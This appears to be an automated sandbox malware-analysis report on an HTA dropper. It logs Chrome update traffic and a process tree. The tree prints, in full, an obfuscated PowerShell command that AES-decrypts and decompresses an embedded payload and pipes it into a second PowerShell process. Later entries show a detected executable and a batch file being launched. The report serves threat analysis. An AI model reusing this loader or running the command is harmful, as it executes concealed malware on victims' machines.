                                                                                                                                                    2024-02-21 07:15:05 UTC1252INData Raw: 29 5d 7d 27 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 65 72 76 65 72 22 3a 22 70 72 6f 64 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 33 2e 31 22 2c 22 64 61 79 73 74 61 72 74 22 3a 7b 22 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 22 3a 38 33 37 30 35 2c 22 65 6c 61 70 73 65 64 5f 64 61 79 73 22 3a 36 32 35 39 7d 2c 22 61 70 70 22 3a 5b 7b 22 61 70 70 69 64 22 3a 22 6e 65 69 66 61 6f 69 6e 64 67 67 66 63 6a 69 63 66 66 6b 67 70 6d 6e 6c 70 70 65 66 66 61 62 64 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 31 32 39 39 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 41 75 74 6f 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74
                                                                                                                                                    Data Ascii: )]}'{"response":{"server":"prod","protocol":"3.1","daystart":{"elapsed_seconds":83705,"elapsed_days":6259},"app":[{"appid":"neifaoindggfcjicffkgpmnlppeffabd","cohort":"1:1299:","status":"ok","cohortname":"Auto","ping":{"status":"ok"},"updatecheck":{"stat
                                                                                                                                                    2024-02-21 07:15:05 UTC1252INData Raw: 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 6d 4d 64 44 68 6b 67 66 46 78 73 4a 79 35 53 51 4b 42 61 49 4f 53 37 76 76 39 30 5c 75 30 30 33 64 22 7d 5d 7d 7d 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 67 6f 6e 70 65 6d 64 67 6b 6a 63 65 63 64 67 62 6e 61 61 62 69 70 70 70 62 6d 67 66 67 67 62 65 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 7a 31 78 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 41 75 74 6f 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 75 72 6c 73 22 3a 7b 22 75 72 6c 22 3a 5b 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f
                                                                                                                                                    Data Ascii: :true,"hash":"mMdDhkgfFxsJy5SQKBaIOS7vv90\u003d"}]}}}},{"appid":"gonpemdgkjcecdgbnaabipppbmgfggbe","cohort":"1:z1x:","status":"ok","cohortname":"Auto","ping":{"status":"ok"},"updatecheck":{"status":"ok","urls":{"url":[{"codebase":"http://edgedl.me.gvt1.co
                                                                                                                                                    2024-02-21 07:15:05 UTC1252INData Raw: 22 61 70 70 69 64 22 3a 22 69 68 6e 6c 63 65 6e 6f 63 65 68 67 64 61 65 67 64 6d 68 62 69 64 6a 68 6e 68 64 63 68 66 6d 6d 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6e 6f 75 70 64 61 74 65 22 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 68 6e 69 6d 70 6e 65 68 6f 6f 64 68 65 65 64 67 68 64 65 65 69 6a 6b 6c 6b 65 61 61 63 62 64 63 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22
                                                                                                                                                    Data Ascii: "appid":"ihnlcenocehgdaegdmhbidjhnhdchfmm","cohort":"1::","status":"ok","cohortname":"","ping":{"status":"ok"},"updatecheck":{"status":"noupdate"}},{"appid":"hnimpnehoodheedghdeeijklkeaacbdc","cohort":"1::","status":"ok","cohortname":"","ping":{"status":"
                                                                                                                                                    2024-02-21 07:15:05 UTC342INData Raw: 34 39 32 5f 68 6e 69 6d 70 6e 65 68 6f 6f 64 68 65 65 64 67 68 64 65 65 69 6a 6b 6c 6b 65 61 61 63 62 64 63 2e 63 72 78 22 2c 22 66 70 22 3a 22 31 2e 36 66 36 62 63 39 33 64 63 64 36 32 64 63 32 35 31 38 35 30 64 32 66 66 34 35 38 66 64 61 39 36 30 38 33 63 65 62 37 66 62 65 38 65 65 62 31 31 32 34 38 62 38 34 38 35 65 66 32 61 65 61 32 33 22 2c 22 72 65 71 75 69 72 65 64 22 3a 74 72 75 65 7d 5d 7d 7d 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 6f 62 65 64 62 62 68 62 70 6d 6f 6a 6e 6b 61 6e 69 63 69 6f 67 67 6e 6d 65 6c 6d 6f 6f 6d 6f 63 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 73 36 66 3a 32 30 6f 6c 40 30 2e 35 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 41 75 74 6f 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74
                                                                                                                                                    Data Ascii: 492_hnimpnehoodheedghdeeijklkeaacbdc.crx","fp":"1.6f6bc93dcd62dc251850d2ff458fda96083ceb7fbe8eeb11248b8485ef2aea23","required":true}]}}}},{"appid":"obedbbhbpmojnkanicioggnmelmoomoc","cohort":"1:s6f:20ol@0.5","status":"ok","cohortname":"Auto","ping":{"stat
                                                                                                                                                    2024-02-21 07:15:05 UTC1252INData Raw: 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 68 69 6f 6a 34 35 68 7a 6a 6b 66 75 6e 6e 37 63 63 72 62 71 79 79 68 75 33 71 5f 32 30 32 33 30 39 31 36 2e 35 36 37 38 35 34 36 36 37 2e 31 34 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 68 69 6f 6a 34 35 68 7a 6a 6b 66 75 6e 6e 37 63 63 72 62 71 79 79 68 75 33 71 5f 32 30 32 33 30 39 31 36 2e 35 36 37 38 35 34 36 36 37 2e 31 34 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72
                                                                                                                                                    Data Ascii: 1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567854667.14/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567854667.14/"},{"codebase":"http://dl.google.com/r
                                                                                                                                                    2024-02-21 07:15:05 UTC1252INData Raw: 22 2c 22 75 72 6c 73 22 3a 7b 22 75 72 6c 22 3a 5b 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 33 72 6d 33 63 69 71 73 33 66 6a 72 34 62 63 34 78 35 76 77 75 69 6c 64 65 71 5f 39 2e 34 39 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 33 72 6d 33 63 69 71 73 33 66 6a 72 34 62 63 34 78 35 76 77 75 69 6c 64 65 71 5f 39 2e 34 39 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74
                                                                                                                                                    Data Ascii: ","urls":{"url":[{"codebase":"http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3rm3ciqs3fjr4bc4x5vwuildeq_9.49.1/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3rm3ciqs3fjr4bc4x5vwuildeq_9.49.1/"},{"codebase":"ht
                                                                                                                                                    2024-02-21 07:15:05 UTC1252INData Raw: 65 6e 74 2f 61 64 77 65 34 32 35 78 6c 7a 71 33 32 67 78 6c 35 62 77 32 34 71 64 6f 6c 62 64 61 5f 32 30 32 34 2e 31 2e 32 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 77 65 34 32 35 78 6c 7a 71 33 32 67 78 6c 35 62 77 32 34 71 64 6f 6c 62 64 61 5f 32 30 32 34 2e 31 2e 32 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 77 65 34 32 35 78 6c 7a 71 33 32 67 78 6c 35 62 77 32 34 71 64 6f 6c 62 64 61 5f 32 30 32
                                                                                                                                                    Data Ascii: ent/adwe425xlzq32gxl5bw24qdolbda_2024.1.2.1/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adwe425xlzq32gxl5bw24qdolbda_2024.1.2.1/"},{"codebase":"http://dl.google.com/release2/chrome_component/adwe425xlzq32gxl5bw24qdolbda_202
                                                                                                                                                    2024-02-21 07:15:05 UTC1252INData Raw: 70 3a 2f 2f 72 65 64 69 72 65 63 74 6f 72 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 41 49 5a 6b 38 4f 37 43 76 32 55 55 62 78 63 5f 61 61 55 79 6b 4b 49 5f 37 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 41 49 5a 6b 38 4f 37 43 76 32 55 55 62 78 63 5f 61 61 55 79 6b 4b 49 5f 37 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 64 69 72 65 63 74 6f 72 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d
                                                                                                                                                    Data Ascii: p://redirector.gvt1.com/edgedl/release2/chrome_component/AIZk8O7Cv2UUbxc_aaUykKI_7/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIZk8O7Cv2UUbxc_aaUykKI_7/"},{"codebase":"https://redirector.gvt1.com/edgedl/release2/chrome_com
                                                                                                                                                    2024-02-21 07:15:05 UTC1252INData Raw: 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 63 65 7a 79 6a 79 74 32 66 70 32 78 35 33 64 68 79 71 62 76 74 33 67 78 64 6c 71 5f 36 33 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 63 65 7a 79 6a 79 74 32 66 70 32 78 35 33 64 68 79 71 62 76 74 33 67 78 64 6c 71 5f 36 33 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74
                                                                                                                                                    Data Ascii: se":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acezyjyt2fp2x53dhyqbvt3gxdlq_63/"},{"codebase":"http://dl.google.com/release2/chrome_component/acezyjyt2fp2x53dhyqbvt3gxdlq_63/"},{"codebase":"https://dl.google.com/release2/chrome_component


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    18192.168.2.549744142.250.64.784437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:15:34 UTC449OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000002512400CC HTTP/1.1
                                                                                                                                                    Host: clients1.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    2024-02-21 07:15:34 UTC817INHTTP/1.1 200 OK
                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-IW7mSz5gXc5Fgua1EcbU8w' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DZBHmG59303xeBSoU7hSEQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:15:34 GMT
                                                                                                                                                    Expires: Wed, 21 Feb 2024 07:15:34 GMT
                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Server: GSE
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
                                                                                                                                                    2024-02-21 07:15:34 UTC220INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 37 30 65 61 35 65 61 35 0a
                                                                                                                                                    Data Ascii: rlzC1: 1C1ONGR_enUS1098rlzC2: 1C2ONGR_enUS1098rlzC7: 1C7ONGR_enUS1098dcc: set_dcc: C1:1C1ONGR_enUS1098,C2:1C2ONGR_enUS1098,C7:1C7ONGR_enUS1098events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: 70ea5ea5


                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:08:13:59
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:mshta.exe "C:\Users\user\Desktop\setup.hta"
                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                    File size:13'312 bytes
                                                                                                                                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:08:14:00
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -
                                                                                                                                                    Imagebase:0xd90000
                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:08:14:00
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:08:14:01
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                                                                                                                                                    Imagebase:0xd90000
                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:08:14:02
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4
                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:08:14:03
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1952,i,13972747378656180607,2639153371829192782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:7
                                                                                                                                                    Start time:08:14:05
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                    Imagebase:0x7ff6ef0c0000
                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:8
                                                                                                                                                    Start time:08:14:10
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\ClassroomEc.exe"
                                                                                                                                                    Imagebase:0xa70000
                                                                                                                                                    File size:1'212'711 bytes
                                                                                                                                                    MD5 hash:956D074F7C6BD174C43586F07892E820
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 29%, ReversingLabs
                                                                                                                                                    • Detection: 49%, Virustotal, Browse
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:9
                                                                                                                                                    Start time:08:14:10
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:10
                                                                                                                                                    Start time:08:14:12
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit
                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:11
                                                                                                                                                    Start time:08:14:12
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:12
                                                                                                                                                    Start time:08:14:12
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:tasklist
                                                                                                                                                    Imagebase:0x840000
                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                    Has elevated privileges:true
